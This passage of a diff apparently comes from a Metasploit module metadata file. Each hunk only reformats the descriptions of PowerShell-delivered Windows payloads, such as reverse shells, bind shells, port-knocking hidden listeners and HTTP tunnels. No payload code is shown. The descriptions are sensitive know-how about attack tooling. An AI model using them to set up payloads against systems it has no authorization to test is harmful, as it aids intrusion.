+    "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -184110,7 +184675,7 @@
      "hdm <x@hdm.io>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Uploads an executable and runs it (staged). Try to connect back to the attacker, on all possible ports (1-65535, slowly)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)",
    "references": [

    ],
@@ -184149,7 +184714,7 @@
      "skape <mmiller@hick.org>",
      "RageLtMan"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Uploads an executable and runs it (staged). Connect back to the attacker",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -184189,7 +184754,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Uploads an executable and runs it (staged). Connect back to the attacker",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -184229,7 +184794,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Uploads an executable and runs it (staged). Connect back to the attacker",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -184267,7 +184832,7 @@
      "hdm <x@hdm.io>",
      "OJ Reeves"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Uploads an executable and runs it (staged). Connect back to the attacker with UUID Support",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nConnect back to the attacker with UUID Support",
    "references": [

    ],
@@ -184304,7 +184869,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "RageLtMan <rageltman@sempervictus>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Uploads an executable and runs it (staged). Connect back to the attacker with UUID Support",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nConnect back to the attacker with UUID Support",
    "references": [

    ],
@@ -184342,7 +184907,7 @@
      "skape <mmiller@hick.org>",
      "Borja Merino <bmerinofe@gmail.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for a connection. First, the port will need to be knocked from\n                          the IP defined in KHOST. This IP will work as an authentication method\n                          (you can spoof it with tools like hping). After that you could get your\n                          shellcode from any IP. The socket will appear as \"closed,\" thus helping to\n                          hide the shellcode",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -184381,7 +184946,7 @@
      "skape <mmiller@hick.org>",
      "Borja Merino <bmerinofe@gmail.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for a connection from a hidden port and spawn a command shell to the allowed host.",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -184419,7 +184984,7 @@
      "hdm <x@hdm.io>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for an IPv6 connection (Windows x86)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for an IPv6 connection (Windows x86)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -184458,7 +185023,7 @@
      "skape <mmiller@hick.org>",
      "OJ Reeves"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for an IPv6 connection with UUID Support (Windows x86)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for an IPv6 connection with UUID Support (Windows x86)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -184495,7 +185060,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "UserExistsError"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for a pipe connection (Windows x86)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a pipe connection (Windows x86)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -184532,7 +185097,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "vlad902 <vlad902@gmail.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for a connection (No NX)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection (No NX)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -184570,7 +185135,7 @@
      "hdm <x@hdm.io>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for a connection (Windows x86)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection (Windows x86)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -184610,7 +185175,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for a connection",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -184648,7 +185213,7 @@
      "hdm <x@hdm.io>",
      "OJ Reeves"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for a connection with UUID Support (Windows x86)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection with UUID Support (Windows x86)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -184685,7 +185250,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Use an established connection",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nUse an established connection",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -184724,7 +185289,7 @@
      "bannedit <bannedit@metasploit.com>",
      "hdm <x@hdm.io>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. \n        Tunnel communication over an HTTP or HTTPS hop point. Note that you must first upload\n        data/hop/hop.php to the PHP server you wish to use as a hop.",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nTunnel communication over an HTTP or HTTPS hop point. Note that you must first upload\ndata/hop/hop.php to the PHP server you wish to use as a hop.",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -184761,7 +185326,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "hdm <x@hdm.io>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Tunnel communication over HTTP (Windows wininet)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nTunnel communication over HTTP (Windows wininet)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -184798,7 +185363,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "hdm <x@hdm.io>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Tunnel communication over HTTP",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nTunnel communication over HTTP",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -184836,7 +185401,7 @@
      "hdm <x@hdm.io>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to the attacker over IPv6",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker over IPv6",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -184873,7 +185438,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "vlad902 <vlad902@gmail.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to the attacker (No NX)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker (No NX)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -184910,7 +185475,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "spoonm <spoonm@no$email.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to the attacker",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -184948,7 +185513,7 @@
      "hdm <x@hdm.io>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to the attacker",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -184986,7 +185551,7 @@
      "hdm <x@hdm.io>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Try to connect back to the attacker, on all possible ports (1-65535, slowly)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -185025,7 +185590,7 @@
      "skape <mmiller@hick.org>",
      "RageLtMan"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to the attacker",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -185065,7 +185630,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to the attacker",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -185105,7 +185670,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to the attacker",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -185143,7 +185708,7 @@
      "hdm <x@hdm.io>",
      "OJ Reeves"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to the attacker with UUID Support",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker with UUID Support",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -185181,7 +185746,7 @@
      "hdm <x@hdm.io>",
      "Borja Merino <bmerinofe@gmail.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Tunnel communication over HTTP (Windows winhttp)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nTunnel communication over HTTP (Windows winhttp)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -185218,7 +185783,7 @@
      "bwatters-r7",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Custom shellcode stage. Listen for an IPv6 connection (Windows x64)",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nListen for an IPv6 connection (Windows x64)",
    "references": [

    ],
@@ -185255,7 +185820,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Custom shellcode stage. Listen for an IPv6 connection with UUID Support (Windows x64)",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nListen for an IPv6 connection with UUID Support (Windows x64)",
    "references": [

    ],
@@ -185291,7 +185856,7 @@
      "bwatters-r7",
      "UserExistsError"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Custom shellcode stage. Listen for a pipe connection (Windows x64)",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nListen for a pipe connection (Windows x64)",
    "references": [

    ],
@@ -185327,7 +185892,7 @@
      "bwatters-r7",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Custom shellcode stage. Listen for a connection (Windows x64)",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nListen for a connection (Windows x64)",
    "references": [

    ],
@@ -185368,7 +185933,7 @@
      "max3raza",
      "RageLtMan"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Custom shellcode stage. Connect back to the attacker",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nConnect back to the attacker",
    "references": [

    ],
@@ -185405,7 +185970,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Custom shellcode stage. Listen for a connection with UUID Support (Windows x64)",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nListen for a connection with UUID Support (Windows x64)",
    "references": [

    ],
@@ -185441,7 +186006,7 @@
      "bwatters-r7",
      "OJ Reeves"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Custom shellcode stage. Tunnel communication over HTTP (Windows x64 wininet)",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 wininet)",
    "references": [

    ],
@@ -185479,7 +186044,7 @@
      "agix",
      "rwincey"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Custom shellcode stage. Tunnel communication over HTTP (Windows x64 wininet)",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 wininet)",
    "references": [

    ],
@@ -185515,7 +186080,7 @@
      "bwatters-r7",
      "OJ Reeves"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Custom shellcode stage. Connect back to the attacker via a named pipe pivot",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nConnect back to the attacker via a named pipe pivot",
    "references": [

    ],
@@ -185551,7 +186116,7 @@
      "bwatters-r7",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Custom shellcode stage. Connect back to the attacker (Windows x64)",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nConnect back to the attacker (Windows x64)",
    "references": [

    ],
@@ -185592,7 +186157,7 @@
      "max3raza",
      "RageLtMan"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Custom shellcode stage. Connect back to the attacker",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nConnect back to the attacker",
    "references": [

    ],
@@ -185629,7 +186194,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Custom shellcode stage. Connect back to the attacker with UUID Support (Windows x64)",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nConnect back to the attacker with UUID Support (Windows x64)",
    "references": [

    ],
@@ -185665,7 +186230,7 @@
      "bwatters-r7",
      "OJ Reeves"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Custom shellcode stage. Tunnel communication over HTTP (Windows x64 winhttp)",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 winhttp)",
    "references": [

    ],
@@ -185701,7 +186266,7 @@
      "bwatters-r7",
      "OJ Reeves"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Custom shellcode stage. Tunnel communication over HTTPS (Windows x64 winhttp)",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nTunnel communication over HTTPS (Windows x64 winhttp)",
    "references": [

    ],
@@ -185737,7 +186302,7 @@
      "Matt Graeber",
      "Shelby Pace"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Spawn a piped command shell (staged). Connect to MSF and read in stage",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nSpawn a piped command shell (staged).\n\nConnect to MSF and read in stage",
    "references": [

    ],
@@ -185772,7 +186337,7 @@
      "Spencer McIntyre",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Execute an arbitrary command (Windows x64)",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nExecute an arbitrary command (Windows x64)",
    "references": [

    ],
@@ -185808,7 +186373,7 @@
      "scriptjunkie",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Load an arbitrary x64 library path",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nLoad an arbitrary x64 library path",
    "references": [

    ],
@@ -185843,7 +186408,7 @@
      "Spencer McIntyre",
      "pasta <jaguinaga@infobytesec.com>"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Spawn a dialog via MessageBox using a customizable title, text & icon",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nSpawn a dialog via MessageBox using a customizable title, text & icon",
    "references": [

    ],
@@ -185880,7 +186445,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Listen for an IPv6 connection (Windows x64)",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for an IPv6 connection (Windows x64)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -185918,7 +186483,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Listen for an IPv6 connection with UUID Support (Windows x64)",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for an IPv6 connection with UUID Support (Windows x64)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -185957,7 +186522,7 @@
      "OJ Reeves",
      "UserExistsError"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Listen for a pipe connection (Windows x64)",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for a pipe connection (Windows x64)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -185995,7 +186560,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Listen for a connection (Windows x64)",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for a connection (Windows x64)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -186037,7 +186602,7 @@
      "max3raza",
      "RageLtMan"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Connect back to the attacker",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to the attacker",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -186075,7 +186640,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Listen for a connection with UUID Support (Windows x64)",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for a connection with UUID Support (Windows x64)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -186113,7 +186678,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Tunnel communication over HTTP (Windows x64 wininet)",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nTunnel communication over HTTP (Windows x64 wininet)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -186154,7 +186719,7 @@
      "agix",
      "rwincey"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Tunnel communication over HTTP (Windows x64 wininet)",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nTunnel communication over HTTP (Windows x64 wininet)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -186192,7 +186757,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Connect back to the attacker via a named pipe pivot",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to the attacker via a named pipe pivot",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -186230,7 +186795,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Connect back to the attacker (Windows x64)",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to the attacker (Windows x64)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -186272,7 +186837,7 @@
      "max3raza",
      "RageLtMan"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Connect back to the attacker",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to the attacker",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -186310,7 +186875,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Connect back to the attacker with UUID Support (Windows x64)",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to the attacker with UUID Support (Windows x64)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -186348,7 +186913,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Tunnel communication over HTTP (Windows x64 winhttp)",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nTunnel communication over HTTP (Windows x64 winhttp)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -186386,7 +186951,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Tunnel communication over HTTPS (Windows x64 winhttp)",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nTunnel communication over HTTPS (Windows x64 winhttp)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -186423,7 +186988,7 @@
      "ege <egebalci@pm.me>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Listen for an IPv6 connection (Windows x64)",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for an IPv6 connection (Windows x64)",
    "references": [

    ],
@@ -186460,7 +187025,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Listen for an IPv6 connection with UUID Support (Windows x64)",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for an IPv6 connection with UUID Support (Windows x64)",
    "references": [

    ],
@@ -186496,7 +187061,7 @@
      "ege <egebalci@pm.me>",
      "UserExistsError"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Listen for a pipe connection (Windows x64)",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for a pipe connection (Windows x64)",
    "references": [

    ],
@@ -186532,7 +187097,7 @@
      "ege <egebalci@pm.me>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Listen for a connection (Windows x64)",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for a connection (Windows x64)",
    "references": [

    ],
@@ -186573,7 +187138,7 @@
      "max3raza",
      "RageLtMan"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Connect back to the attacker",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to the attacker",
    "references": [

    ],
@@ -186610,7 +187175,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Listen for a connection with UUID Support (Windows x64)",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for a connection with UUID Support (Windows x64)",
    "references": [

    ],
@@ -186646,7 +187211,7 @@
      "ege <egebalci@pm.me>",
      "OJ Reeves"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Connect back to the attacker via a named pipe pivot",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to the attacker via a named pipe pivot",
    "references": [

    ],
@@ -186682,7 +187247,7 @@
      "ege <egebalci@pm.me>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Connect back to the attacker (Windows x64)",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to the attacker (Windows x64)",
    "references": [

    ],
@@ -186723,7 +187288,7 @@
      "max3raza",
      "RageLtMan"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Connect back to the attacker",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to the attacker",
    "references": [

    ],
@@ -186760,7 +187325,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Connect back to the attacker with UUID Support (Windows x64)",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to the attacker with UUID Support (Windows x64)",
    "references": [

    ],
@@ -186795,7 +187360,7 @@
      "Spencer McIntyre",
      "bwatters-r7"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Connect back to attacker and report UUID (Windows x64)",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to attacker and report UUID (Windows x64)",
    "references": [

    ],
@@ -186941,7 +187506,7 @@
      "Spencer McIntyre",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Spawn a piped command shell (Windows x64) (staged). Listen for an IPv6 connection (Windows x64)",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for an IPv6 connection (Windows x64)",
    "references": [

    ],
@@ -186977,7 +187542,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Spawn a piped command shell (Windows x64) (staged). Listen for an IPv6 connection with UUID Support (Windows x64)",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for an IPv6 connection with UUID Support (Windows x64)",
    "references": [

    ],
@@ -187013,7 +187578,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "UserExistsError"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Spawn a piped command shell (Windows x64) (staged). Listen for a pipe connection (Windows x64)",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a pipe connection (Windows x64)",
    "references": [

    ],
@@ -187048,7 +187613,7 @@
      "Spencer McIntyre",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Execute an x64 payload from a command via PowerShell. Spawn a piped command shell (Windows x64) (staged). Listen for a connection (Windows x64)",
+    "description": "Execute an x64 payload from a command via PowerShell.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a connection (Windows x64)",
